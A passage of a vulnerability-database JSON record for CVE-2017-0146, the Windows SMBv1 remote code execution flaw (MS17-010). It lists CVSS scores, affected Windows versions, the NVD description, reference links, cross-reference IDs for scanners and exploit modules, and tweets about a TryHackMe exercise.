"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0146", "id": "CVE-2017-0146", "immutableFields": [], "lastseen": "2021-02-02T06:36:30", "modified": "2018-06-21T01:29:00", "objectVersion": "1.5", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96707", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0146", "type": "cve", "viewCount": 43}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:36:30"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-0146"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:16", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SMNTC-96707"], "type": "symantec"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0146"], "type": "mscve"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:16", "rev": 2, "value": 9.5, "vector": "NONE"}}, "hash": "8e28bf195f3ad035ccf56633a24a9745bf73e0869f09d9f0e689301c1e301e30", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "cde40a13c5d43ca610b08893c2bdb748", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "bf11cde0d5ceb8e4aedc6a3dd6d89286", "key": "description"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "26cf6424f2bdd76a83a3a196b3158794", "key": "references"}, {"hash": "90d3da5cc0f990156ba985c80c37d178", "key": "href"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d1b2ee04e6815071fc75b496057c9a52", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0146", "id": "CVE-2017-0146", "lastseen": "2020-09-21T14:31:16", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96707", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0146", "type": "cve", "viewCount": 40}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:31:16"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0146"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T13:07:29", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SMNTC-96707"], "type": "symantec"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0146"], "type": "mscve"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2020-10-03T13:07:29", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2020-10-03T13:07:29", "rev": 2, "value": 9.5, "vector": "NONE"}, "twitter": {"counter": 26, "modified": "2020-10-03T13:07:29", "tweets": [{"link": "https://twitter.com/haisenb3rg/status/1355219896876101633", "text": "Blue - I have just completed this room! Check it out: https://t.co/wl8T2v20v5?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/tajsec0x/status/1352766309558345729", "text": "Blue - I have just completed this room! Check it out: \n/hashtag/eternal?src=hashtag_click blue /hashtag/MS17?src=hashtag_click-010 /hashtag/CVE2017?src=hashtag_click-0144 # CVE-2017-0145 # CVE-2017-0146"}, {"link": "https://twitter.com/0xMando/status/1354504708145213440", "text": "Blue - I have just completed this room! Check it out: https://t.co/CM3xc69bUu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe I did it mom! /darkstar7471"}, {"link": "https://twitter.com/strudinox/status/1352367654514814976", "text": "Blue - I have just completed this room! Check it out: https://t.co/kUcxTcX0cK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/DaemonExala/status/1355469648314163201", "text": "Blue - I have just completed this room! Check it out: https://t.co/pRJxaPlaBu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue /hashtag/MS17?src=hashtag_click-010 /hashtag/CVE2017?src=hashtag_click-0144 /hashtag/CVE?src=hashtag_click-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/mell0wx/status/1350568935335358464", "text": "Blue - I have just completed this room! Check it out: https://t.co/C1ARvEqI3z?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Wrth1_/status/1350977622700937217", "text": "Blue - I have just completed this room! Check it out: https://t.co/Obry4AfJD1?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/reason2008/status/1352019208620683266", "text": "Blue - I have just completed this room! Check it out: https://t.co/eudEV3HK2W?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/m3t4ll0rdz/status/1353147857017176069", "text": "Blue - I have just completed this room! Check it out: https://t.co/6r4PlwLHqj?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/CreatureofHabi7/status/1351637620674211841", "text": "Blue - I have just completed this room! Check it out: https://t.co/RchZjhOQvw?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [], "hash": "716c3f87807bf2d659427adcb8f28b0e9d53f1f34b7287bbeb4abaef372ce95f", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "cde40a13c5d43ca610b08893c2bdb748", "key": "cvelist"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "bf11cde0d5ceb8e4aedc6a3dd6d89286", "key": "description"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "26cf6424f2bdd76a83a3a196b3158794", "key": "references"}, {"hash": "90d3da5cc0f990156ba985c80c37d178", "key": "href"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d1b2ee04e6815071fc75b496057c9a52", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0146", "id": "CVE-2017-0146", "lastseen": "2020-10-03T13:07:29", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96707", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0146", "type": "cve", "viewCount": 42}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-10-03T13:07:29"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0146"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-05T13:14:20", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SMNTC-96707"], "type": "symantec"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 